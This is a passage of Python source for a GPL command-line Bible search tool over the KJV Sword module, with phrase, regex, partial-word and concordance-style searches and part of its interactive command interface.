temp_set.symmetric_difference_update(result_set)
return temp_set
# Remove any verses that have the NOT words in them.
found_set = combine_proc(word_list).difference(combine_proc(not_list))
return found_set
@_process_search
def combined_phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" combined_phrase_search(self, search_terms, strongs=False,
morph=False, case_sensitive=False, range_str=''): ->
Perform a combined phrase search. Search terms could be
'created NOT (and AND but)' and it would find all verses with the word
'created' in them and remove any verse that had the phrase 'and but.'
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for '%s'..." % search_terms, tag=1)
# Process the search_terms.
arg_parser = CombinedParse(search_terms)
# Get the list of words and/or phrases to include.
word_list = arg_parser.word_list
# Get the list of words and/or phrases to NOT include.
not_list = arg_parser.not_list
phrase_search = self.phrase_search
def combine_proc(str_list):
""" Performs combined phrase search on the strings in str_list, and
returns a set of references that match.
"""
temp_set = set()
for word in str_list:
# Do a phrase search on the word string.
result_set = phrase_search(word.replace('+', ' '), strongs,
morph, case_sensitive,
range_str)
# Include all the verses that have any of the word groups.
temp_set.update(result_set)
return temp_set
# Remove any verses that have the NOT words in them.
found_set = combine_proc(word_list).difference(combine_proc(not_list))
return found_set
@_process_search
def multiword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" multiword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a multiword search using the search_terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with all these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# All that needs to be done is find all references with all the
# searched words in them.
found_set = self._index_dict.value_intersect(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def eitheror_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" eitheror_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one and only one of the terms
searched for.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with one and not all of these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# Any verse with one and only one of the searched words.
found_set = self._index_dict.value_sym_diff(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def anyword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" anyword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one or more of the search
terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with any of these words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
# Any verse with one or more of the searched words.
found_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
return found_set
@_process_search
def partial_word_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" partial_word_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a search returning any verse with one or more words matching
the partial words given in the search terms. Partial words are markes
tih *'s (e.g. '*guil*' will match any word with 'guil' in it such as
'guilt' or 'beguile.'
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with any of these partial words "
"'%s'..." % ', '.join(search_terms.split()), tag=1)
#found_set = self._index_dict.value_union(
#self._words_from_partial(search_terms, case_sensitive),
#case_sensitive)
search_list = search_terms.split()
found_set = self._index_dict.from_partial(search_list, case_sensitive)
return found_set
def _words_from_partial(self, partial_word_list, case_sensitive=False):
""" Search through a list of partial words and yield words that match.
"""
flags = re.I if not case_sensitive else 0
# Split the search terms and search through each word key in the index
# for any word that contains the partial word.
word_list = partial_word_list.split()
for word in self._index_dict['_words_']:
for partial_word in word_list:
# A Regular expression that matches any number of word
# characters for every '*' in the term.
reg_str = '\\b%s\\b' % partial_word.replace('*', '\w*')
try:
word_regx = re.compile(reg_str, flags)
except Exception as err:
print('There is a problem with the regular expression '
'%s: %s' % (reg_str, err), file=sys.stderr)
exit()
if word_regx.match(word):
yield word
def _process_phrase(func):
""" Returns a wrapper function for wrapping phrase like searches.
"""
@wraps(func)
def wrapper(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" Gets a regular expression from the wrapped function, then
builds a set of verse references to search, finally it calls the
searching function with the regular expression and the verse
reference iterator, and returns the resulting set of references.
"""
search_regx = func(self, search_terms, strongs, morph, added,
case_sensitive, range_str)
# First make sure we are only searching verses that have all the
# search terms in them.
search_list = search_terms.split()
if '*' in search_terms:
ref_set = self._index_dict.from_partial(search_list,
case_sensitive,
common_limit=5000)
else:
ref_set = self._index_dict.value_intersect(search_list,
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
# No need to search for a single word phrase.
if len(search_terms.split()) == 1:
return ref_set
# Sort the list so it may be a little faster. Only needed if we're
# using the sword module to look them up.
ref_iter = self._sorted_iter(ref_set)
# Disable Strong's and Morphological if only words are used.
strongs = bool(self._strongs_regx.search(search_terms))
morph = bool(self._morph_regx.search(search_terms))
return self.find_from_regex(ref_iter, search_regx, strongs, morph)
return wrapper
@_process_search
@_process_phrase
def ordered_multiword_search(self, search_terms, strongs=False,
morph=False, added=True, case_sensitive=False,
range_str=''):
""" ordered_multiword_search(self, search_terms, strongs=False,
morph=False, case_sensitive=False, range_str='') ->
Perform an ordered multiword search. Like a multiword search, but all
the words have to be in order.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with these words in order "
"'%s'..." % search_terms, tag=1)
return self.search_terms_to_regex(search_terms, case_sensitive,
sloppy=True)
@_process_search
@_process_phrase
def phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" phrase_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a phrase search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with this phrase "
"'%s'..." % search_terms, tag=1)
# Make all the terms the same case if case doesn't matter.
flags = re.I if not case_sensitive else 0
if strongs:
# Match strongs phrases.
search_reg_str = search_terms.replace(' ', r'[^<]*')
elif morph:
# Match morphological phrases.
search_reg_str = search_terms.replace(' ', r'[^\{]*')
else:
# Match word phrases
search_reg_str = '\\b%s\\b' % search_terms.replace(' ',
r'\b(<[^>]*>|\{[^\}]*\}|\W)*\b')
# Make a regular expression from the search terms.
return re.compile(search_reg_str, flags)
@_process_search
@_process_phrase
def mixed_phrase_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" mixed_phrase_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a phrase search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for verses with this phrase "
"'%s'..." % search_terms, tag=1)
# Make a regular expression from the search terms.
return self.search_terms_to_regex(search_terms, case_sensitive)
@_process_search
def regex_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" regex_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a regular expression search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
info_print("Searching for regular expression '%s'..." % search_terms,
tag=1)
# re.I is case insensitive.
flags = re.I if not case_sensitive else 0
try:
# Make a regular expression from the search_terms.
search_regx = re.compile(r'%s' % search_terms, flags)
except Exception as err:
print('There is a problem with the regular expression "%s": %s' % \
(search_terms, err), file=sys.stderr)
exit()
if range_str:
# Only search through the supplied range.
ref_iter = self._sorted_iter(range_str)
else:
# Search the entire Bible.
ref_iter = VerseIter('Genesis 1:1')
return self.find_from_regex(ref_iter, search_regx, strongs, morph,
tag=1, try_clean=True)
def find_from_regex(self, ref_iter, search_regex, strongs=False,
morph=False, added=True, tag=3, try_clean=False):
""" Iterates through all the verses in the ref iter iterator and
returns a list of verses whose text matches search_regx.
"""
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = IndexedVerseTextIter(ref_iter, strongs=strongs,
morph=morph, added=added,
module=self._module_name)
found_set = set()
for verse_ref, verse_text in verse_iter:
info_print('\033[%dD\033[KSearching...%s' % \
(len(verse_ref) + 20, verse_ref), end='', tag=tag)
# Search for matches in the verse text.
if search_regex.search(verse_text):
found_set.add(verse_ref)
elif try_clean and not strongs and not morph:
# Should we do this or should we trust the user knows what
# puctuation are in the verses?
clean_verse_text = self._clean_text(verse_text)
if search_regex.search(clean_verse_text):
found_set.add(verse_ref)
info_print("...Done.", tag=tag)
return found_set
def mixed_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" mixed_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='') ->
Perform a mixed search.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
added - Search in the added text (i.e. italics).
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
"""
found_set = set()
not_set = set()
and_set = set()
or_set = set()
xor_set = set()
combine_dict = {
'!': not_set.update,
'+': and_set.intersection_update,
'|': or_set.update,
'^': xor_set.symmetric_difference_update,
}
for term in search_terms:
if term[0] in '!+^|':
# Set the correct combining function, and cleanup the item.
if term[0] == '+' and not and_set:
# All of these verses go in the output.
combine_func = and_set.update
else:
combine_func = combine_dict[term[0]]
term = term[1:]
else:
if self._multi and found_set:
# If multiword is default and found_set is not empty
# make all search terms appear in the output.
combine_func = found_set.intersection_update
else:
# Any of these verses could be in the output
combine_func = found_set.update
if term.startswith('&'):
# Allow regular expression searching.
term = term[1:]
search_func = self.regex_search
elif ' ' in term:
# Search term is a quoted string, so treat it like a phrase.
if term.startswith('~'):
# ~'s trigger ordered multiword or sloppy phrase search.
term = term[1:]
search_func = self.ordered_multiword_search
else:
search_func = self.mixed_phrase_search
elif '*' in term:
# Search for partial words.
search_func = self.partial_word_search
else:
# A single word should be (multi/any)-word.
search_func = self.multiword_search
# Perform a strongs search.
strongs = bool(self._strongs_regx.match(term.upper()))
# Perform a morpholagical search.
morph = bool(self._morph_regx.match(term.upper()))
# Search for words or phrases.
temp_set = search_func(term, strongs, morph, added, case_sensitive,
range_str)
# Add the results to the correct set.
combine_func(temp_set)
# Update the result set.
found_set.update(or_set)
found_set.update(xor_set)
if and_set and found_set:
# Make sure all the verses that are in the output have the words
# or phrases that hade a '+' in front of them.
found_set = and_set.union(found_set.intersection(and_set))
elif and_set:
# Found set must be empty to fill it with and_set's contents.
found_set.update(and_set)
# Finally remove all the verses that are in the not_set.
found_set.difference_update(not_set)
return found_set
def sword_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str='',
search_type='lucene'):
""" sword_search(self, search_terms, strongs=False, morph=False,
case_sensitive=False, range_str='', search_type=-4) ->
Use the sword module to search for the terms.
search_terms - Terms to search for.
strongs - Search for Strong's Number phrases.
morph - Search for Morphological Tag phrases.
case_sensitive - Perform a case sensitive search.
range_str - A verse range to limit the search to.
search_type - What search type to use.
"""
search_terms = ' '.join(search_terms)
info_print("Searching using the Sword library for "
"'%s'..." % search_terms, tag=1)
found_set = set()
search_type_dict = {
'regex': 0,
'phrase': -1,
'multiword': -2,
'entryattrib': -3, # (e.g. Word//Lemma//G1234)
'lucene': -4
}
try:
# Render the text as plain.
markup = Sword.MarkupFilterMgr(Sword.FMT_PLAIN)
# Don't own this or it will crash.
markup.thisown = False
mgr = Sword.SWMgr(markup)
# Load the module.
module = mgr.getModule(self._module_name)
# Set the search type based on the search_type argument.
search_type = search_type_dict.get(search_type.lower(), -4)
# Make sure we can search like this.
if not module.isSearchSupported(search_terms, search_type):
print("Search not supported", file=sys.stderr)
return found_set()
# Get the range key.
if not range_str:
range_str = 'Genesis-Revelation'
range_k = Sword.VerseKey().parseVerseList(range_str, 'Genesis 1:1',
True)
flags = re.I if not case_sensitive else 0
if strongs:
# Search for strongs numbers.
# I don't know how to search for morphological tags using
# Swords search function.
prefix = 'lemma:'
for term in ','.join(search_terms.split()).split(','):
if not term.startswith('lemma:'):
# Make the term start with lemma: so sword will find
# it.
term = '%s%s' % (prefix, term)
# Perform the search.
resource = module.doSearch(term, search_type, flags,
range_k)
# Get the list of references from the range text.
found_set.update(resource.getRangeText().split('; '))
else:
# Perform the search.
resource = module.doSearch(search_terms, search_type, flags,
range_k)
# Get the list of references from the range text.
found_set.update(resource.getRangeText().strip().split('; '))
except Exception as err:
print("There was a problem while searching: %s" % err,
file=sys.stderr)
found_set.discard('')
return found_set
@_process_search
def test_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
ref_list = sorted(ref_set, key=sort_key)
term_dict = defaultdict(list)
raw_dict = RawDict(iter(ref_list), self._module_name)
words_len = 0
for verse_ref, (verse_text, verse_dict) in raw_dict:
for term in search_terms.split():
if self._strongs_regx.match(term):
num = self._strongs_regx.sub('\\1', term)
words = set(verse_dict[num.upper()])
if words:
term_dict[num.upper()].append({verse_ref: words})
elif self._morph_regx.match(term):
tag = self._morph_regx.sub('\\1', term)
words = set(verse_dict[tag.upper()])
if words:
term_dict[tag.upper()].append({verse_ref: words})
else:
for key, value in verse_dict['_words'][0].items():
if ' %s ' % term.lower() in ' %s ' % key.lower():
attr_dict = value[0]
if strongs and 'strongs' in attr_dict:
attr_list = attr_dict['strongs']
attr_list.append(key)
term_dict[term].append({verse_ref: attr_list})
if morph and 'morph' in attr_dict:
attr_list = attr_dict['morph']
attr_list.append(key)
words_len = max(len(attr_list), words_len)
term_dict[term].append({verse_ref: attr_list})
len_longest_ref = len(max(ref_set, key=len))
for key, value in term_dict.items():
words_len = max([len(i) for d in value for i, v in d.items()])
print('%s:' % key)
for dic in value:
ref, words = tuple(dic.items())[0]
if isinstance(words, list):
w_str = '"%s"' % '", "'.join(words[:-1])
l_str = '"%s"' % words[-1]
words_str = '{0:{2}}: {1}'.format(w_str, l_str, words_len)
else:
words_str = '"%s"' % '", "'.join(words)
print('\t{0:{1}}: {2}'.format(ref, len_longest_ref, words_str))
#print('\t{0:{1}}: "{2}"'.format(ref, len_longest_ref,
# '", "'.join(words)))
exit()
@_process_search
def test2_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = IndexedVerseTextIter(ref_iter, strongs=True,
morph=morph, added=added,
module=self._module_name)
# This will skip words.
not_words_str = r'\b\w+\b'
# This will skip Strong's Numbers.
not_strongs_str = r'<[^>]*>'
# This wil skip Morphological Tags.
not_morph_str = r'\{[^\}]*\}'
# This will skip all punctuation. Skipping ()'s is a problem for
# searching Morphological Tags, but it is necessary for the
# parenthesized words. May break highlighting.
not_punct_str = r'[\s,\?\!\.;:\\/_\(\)\[\]"\'-]'
max_ref_len = len(max(ref_set, key=len))
found_set = set()
term_dict = defaultdict(list)
for verse_ref, verse_text in verse_iter:
for term in search_terms.split():
if self._strongs_regx.match(term):
test_regx = re.compile(r'''
\s
((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)
\s
((?:%s)+)
''' % term, re.I | re.X)
elif self._morph_regx.match(term):
test_regx = re.compile(r'''
\s((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)
(?:<[^>]*>|\s)+
((?:%s)+)
''' % term, re.I | re.X)
else:
test_regx = re.compile(r'''
((?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])*?
%s
(?:\b\w+\b|[\s,\?\!\.;:\\/_\(\)\[\]"\'-])+)+
((?:<[^>]*>|\{[^\}]*\}|\s)+)
''' % term, re.I | re.X)
for match in test_regx.finditer(verse_text):
phrase, num = match.groups()
phrase = phrase.strip(',').strip('.').strip()
phrase = phrase.strip(';').strip('?').strip(':').strip()
num = num.replace('<', '').replace('>', '')
num = num.replace('{', '').replace('}', '')
if not phrase or not num.strip():
if not strongs:
break
print(verse_ref, verse_text)
print(match.group(), match.groups())
exit()
num = '"%s"' % '", "'.join(num.split())
term_dict[term].append(
'\t{0:{1}}: {2:{4}}: "{3}"'.format(verse_ref,
max_ref_len,
num, phrase,
18)
)
for term, lst in term_dict.items():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
print('%s:\n%s' % (term, '\n'.join(lst)))
exit()
@_process_search
def test3_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
if not ref_set:
exit()
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = VerseTextIter(ref_iter, strongs=strongs,
morph=morph, render='raw',
module=self._module_name)
found_set = set()
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
tag_regx = re.compile(r'''
([^<]*) # Before tag.
<(?P<tag>q|w|transChange|note) # Tag name.
([^>]*)> # Tag attributes.
([\w\W]*?)</(?P=tag)> # Tag text and end.
([^<]*) # Between tags.
''', re.I | re.X)
divname_regx = re.compile(r'''
(?:<seg>)?
<(?:divineName)>+
([^<]*?)
([\'s]*)
</(?:divineName)>
(?:</seg>)?
''', re.I | re.X)
xadded_regx = re.compile(r'<seg subType="x-added"[^>]*>([^<]*)</seg>',
re.I)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
term_dict = defaultdict(list)
len_attrs = 0
for verse_ref, verse_text in verse_iter:
#print(render_raw(verse_text, strongs, morph))
#print(render_raw2(verse_text, strongs, morph))
#continue
for term in search_terms.split():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
v_text = ''
info_print('%s\n' % verse_text, tag=4)
term_regx = re.compile('\\b%s\\b' % term, re.I)
for match in tag_regx.finditer(verse_text):
opt, tag_name, tag_attr, tag_text, punct = match.groups()
tag_text = xadded_regx.sub('\\1', tag_text)
if match.re.search(tag_text):
match_list = match.re.findall(tag_text + punct)
else:
match_list = [match.groups()]
for tag_tup in match_list:
opt, tag_name, tag_attr, tag_text, punct = tag_tup
info_print(tag_tup, tag=4)
value_list = []
attr_list = []
strongs_list = []
morph_list = []
tag_text = divname_regx.sub(div_upper, tag_text)
v_text += marker_regx.sub('\\1 ', opt) + tag_text + \
punct
if term.upper() in tag_attr:
attr_list = [term.upper()]
elif term_regx.search(tag_text):
if strongs or not morph:
strongs_list = strong_regx.findall(tag_attr)
if morph:
morph_list = morph_regx.findall(tag_attr)
for lst in (strongs_list, morph_list, attr_list):
if lst:
attr_str = '%s"' % '", "'.join(lst)
value_list = [attr_str, tag_text.strip()]
term_dict[term].append({verse_ref: value_list})
len_attrs = max(len(attr_str), len_attrs)
info_print(v_text, tag=4)
max_len_ref = len(max(ref_set, key=len))
for term, lst in term_dict.items():
print('%s:' % term)
for dic in lst:
ref, (attrs, s) = list(dic.items())[0]
s_l = '{1:{0}}: "{2}'.format(len_attrs, attrs, s)
print('\t{0:{1}}: "{2}"'.format(ref, max_len_ref, s_l))
exit()
@_process_search
def test4_search(self, search_terms, strongs=False, morph=False,
added=True, case_sensitive=False, range_str=''):
""" A Test.
"""
ref_set = self._index_dict.value_union(search_terms.split(),
case_sensitive)
if range_str:
# Only search through the supplied range.
ref_set.intersection_update(range_str)
if not ref_set:
exit()
ref_iter = iter(sorted(ref_set, key=sort_key))
# Get an iterator that will return tuples
# (verse_reference, verse_text).
verse_iter = VerseTextIter(ref_iter, strongs=strongs,
morph=morph, render='raw',
module=self._module_name)
found_set = set()
strong_regx = re.compile(r'strong:([GH]\d+)', re.I)
morph_regx = re.compile(r'(?:Morph|robinson):([\w-]*)', re.I)
tag_regx = re.compile(r'''
([^<>]*) # Before tag.
<(?P<tag>seg|q|w|transChange|note|title)# Tag name.
([^>]*)> # Tag attributes.
([\w\W]*?)</(?P=tag)> # Tag text and end.
([^<]*) # Between tags.
''', re.I | re.X)
divname_regx = re.compile(r'''
<(?:divineName)>
([^<]*?)
([\'s]*)
</(?:divineName)>
''', re.I | re.X)
div_upper = lambda m: m.group(1).upper() + m.group(2)
marker_regx = re.compile(r'.*marker="(.)".*', re.I)
term_dict = defaultdict(list)
len_attrs = 0
def recurse_tag(text, term, verse_ref, ctag_attr=''):
""" Recursively parses raw verse text using regular expressions,
and a list of dictionaries of the search term and any attributes
with its text.
"""
term_list = []
for match in tag_regx.finditer(text):
value_list = []
attr_list = []
strongs_list = []
morph_list = []
opt, tag_name, tag_attr, tag_text, punct = match.groups()
if match.re.search(tag_text):
term_list.extend(recurse_tag(tag_text, term, verse_ref,
tag_attr))
else:
info_print((opt, tag_name, tag_attr, tag_text, punct),
tag=4)
if marker_regx.match(opt):
opt = ''
tag_text = opt + divname_regx.sub(div_upper,
tag_text) + punct
if term.upper() in tag_attr or term.upper() in ctag_attr:
attr_list = [term.upper()]
elif term_regx.search(tag_text):
if strongs or not morph:
strongs_list.extend(strong_regx.findall(tag_attr))
strongs_list.extend(strong_regx.findall(ctag_attr))
if morph:
morph_list.extend(morph_regx.findall(tag_attr))
morph_list.extend(morph_regx.findall(ctag_attr))
for lst in (strongs_list, morph_list, attr_list):
if lst:
a_str = '%s"' % '", "'.join(lst)
value_list = [a_str, tag_text.strip()]
term_list.append({verse_ref: value_list})
return term_list
for verse_ref, verse_text in verse_iter:
#print(render_raw(verse_text, strongs, morph))
#print(render_raw2(verse_text, strongs, morph))
#continue
for term in search_terms.split():
term = term.replace('<', '').replace('>', '')
term = term.replace('{', '').replace('}', '')
v_text = ''
info_print('%s\n' % verse_text, tag=4)
term_regx = re.compile('\\b%s\\b' % term, re.I)
value_list = recurse_tag(verse_text, term, verse_ref)
if value_list:
for i in value_list:
len_attrs = max(len(i[verse_ref][0]), len_attrs)
term_dict[term].extend(value_list)
max_len_ref = len(max(ref_set, key=len))
for term, lst in term_dict.items():
print('%s:' % term)
for dic in lst:
ref, (attrs, s) = list(dic.items())[0]
s_l = '{1:{0}}: "{2}'.format(len_attrs, attrs, s)
print('\t{0:{1}}: "{2}"'.format(ref, max_len_ref, s_l))
return set()
concordance_search = test4_search
class SearchCmd(Cmd):
""" A Command line interface for searching the Bible.
"""
def __init__(self, module='KJV'):
""" Initialize the settings.
"""
self.prompt = '\001[33m\002search\001[m\002> '
self.intro = '''
%s Copyright (C) 2011 Josiah Gordon <josiahg@gmail.com>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
This is a Bible search program that searches the KJV
sword module. If you need help type 'help' to display a list of valid
commands. For help on a specific command type 'help <command>.'
Examples:
mixed 'jordan h03383' (Finds all verses with Strong's number 'H03383'
translated 'Jordan')
concordance live (Lists the references of all the verses with
the word 'live' in them, the Strong's number
that was used, and what the phrase is that
that Strong's number is translated as.)
concordance h02418 (Lists the references of all the verses with
the Strong's number 'H02418' and how it was
translated. It only occures six times and all
of them are in Daniel.)
strongs h02418 (Looks up and gives the definition of the
Strong's number 'H02418.')
set range gen-mal (Sets the range to the Old Testament.)
Just about everything has tab-completion, so you can hit tab a couple
of times to see all the completions to what you are typing.
If you want to see this intro again type: 'intro'
To find out more type 'help'
(example: 'help search' will list the help for the search command.)
To exit type 'quit' or hit 'CTRL+D'
''' % os.path.basename(argv[0])
super(SearchCmd, self).__init__()
self._quoted_regex = re.compile('''
((?P<quote>'|")
.*?
(?P=quote)|[^'"]*)
''', re.X)
# Perform the specified search.
self._search = Search(module=module)
self._results = set()
self._search_list = []
self._highlight_list = []
self._words = self._search._index_dict['_words_']
self._strongs = self._search._index_dict['_strongs_']
self._morph = self._search._index_dict['_morph_']
self._book_list = list(book_gen())
self._setting_dict = {
'search_type': 'mixed',
'search_strongs': False,
'search_morph': False,
'case_sensitive': False,
'context': 0,
'one_line': False,
'show_notes': False,
'show_strongs': False,
'show_morph': False,
'added': True,
'range': '',
'extras': (),
'module': module,
}
self._search_types = ['mixed', 'mixed_phrase', 'multiword', 'anyword',
'combined', 'partial_word', 'ordered_multiword',
'regex', 'eitheror', 'sword_lucene',
'sword_phrase', 'sword_multiword',
'sword_entryattrib']
def _complete(self, text, line, begidx, endidx, complete_list):
""" Return a list of matching text.
"""
retlist = [i for i in complete_list if i.startswith(text)]
if not retlist:
# If nothing was found try words that contain the text.
retlist = [i for i in complete_list if text in i]
if not retlist:
# Finally try matching misspelled words.
retlist = get_close_matches(text, complete_list, cutoff=0.7)
return retlist
def _get_list(self, args):
""" Split the args into quoted strings and seperate words.
"""
arg_list = []
# Split the arg string into quoted phrases and single words.
for i, c in self._quoted_regex.findall(args):
if c in ['"', "'"]:
arg_list.append(i.strip(c))
else:
arg_list.extend(i.split())
return arg_list
def do_test(self, args):
""" A Test.
"""
quoted_regex = re.compile('''((?P<quote>'|").*?(?P=quote)|[^'"]*)''')
print(quoted_regex.findall(args))
print(self._get_list(args))
def _print(self, text_iter):
""" Print all the text breaking it and screens so the user can read it
all.
"""
count = 0
for verse in text_iter:
count += len(verse.splitlines()) if '\n' in verse else 1
print(verse)
if count >= screen_size()[0] - 4:
count = 0
try:
input('[Press enter to see more, or CTRL+D to end.]')
print('[1A[K', end='')
except:
print('[G[K', end='')
break
def precmd(self, line):
""" Set the correct settings before running the line.
"""
if not line:
return line
cmd = line.split()[0]
if cmd in self._search_types:
search_type = cmd
if search_type.startswith('sword_'):
self._setting_dict['extras'] = (search_type[6:],)
search_type = search_type[:5]
else:
self._setting_dict['extras'] = ()
self._setting_dict['search_type'] = search_type
return line
def postcmd(self, stop, line):
""" If lookup was called then show the results.
"""
if not line:
return stop
cmd = line.split()[0]
if cmd == 'lookup':
self.onecmd('show_results')
return stop
def completedefault(self, text, line, begidx, endidx):
""" By default complete words in the Bible.
"""
words_list = self._words
return self._complete(text, line, begidx, endidx, words_list)
def do_shell(self, args):
""" Execute shell commands.
"""
os.system(args)
def do_concordance(self, args):
""" Perform a concordance like search.
"""
if not args:
return
arg_list = self._get_list(args)
# Search.
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
self._search.test4_search(arg_list, strongs_search, morph_search,
search_added, case_sensitive, search_range)
def do_show(self, args):
""" Show relevent parts of the GPL.
"""
if args.lower() in ['c', 'copying']:
# Show the conditions.
print(copying_str)
elif args.lower() in ['w', 'warranty']:
# Show the warranty.
print(warranty_str)
else:
# Show the entire license.
print('%s%s' % (copying_str, warranty_str))
def do_EOF(self, args):
""" Exit when eof is recieved.
"""
return True
def do_quit(self, args):
""" Exit.
"""
return True
def do_help(self, args):
""" Print the help.
"""
if args:
try:
self._print(getattr(self, 'do_%s' % args).__doc__.splitlines())
return
except:
pass
super(SearchCmd, self).do_help(args)
def do_intro(self, args):
""" Re-print the intro screen.
"""
self._print(self.intro.splitlines())
def complete_show_results(self, text, line, begidx, endidx):
""" Tab completion for the show_results command.
"""
cmd_list = ['strongs', 'morph', 'notes', 'one_line']
return self._complete(text, line, begidx, endidx, cmd_list)
def do_show_results(self, args):
""" Output the results.
Print out all the verses that were either found by searching or by
lookup.
Extra arguments:
+/-strongs - Enable/disable strongs in the output.
+/-morph - Enable/disable morphology in the output
+/-notes - Enable/disable foot notes in the output.
+/-added - Enable/disable added text in the output.
+/-one_line - Enable/disable one line output.
anything else - If the output is from looking up verses with
the lookup command, then any other words or
quoted phrases given as arguments will be
highlighted in the output.
"""
search_type = self._setting_dict['search_type']
strongs_search = self._setting_dict['search_strongs']
morph_search = self._setting_dict['search_morph']
search_range = self._setting_dict['range']
case_sensitive = self._setting_dict['case_sensitive']
search_added = self._setting_dict['added']
module_name = self._setting_dict['module']
highlight_list = self._highlight_list
kwargs = self._setting_dict
results = self._results
# Get the output arguments.
show_strongs = self._setting_dict['show_strongs'] or strongs_search
show_morph = self._setting_dict['show_morph'] or morph_search
show_notes = self._setting_dict['show_notes']
one_line = self._setting_dict['one_line']
arg_list = self._get_list(args)
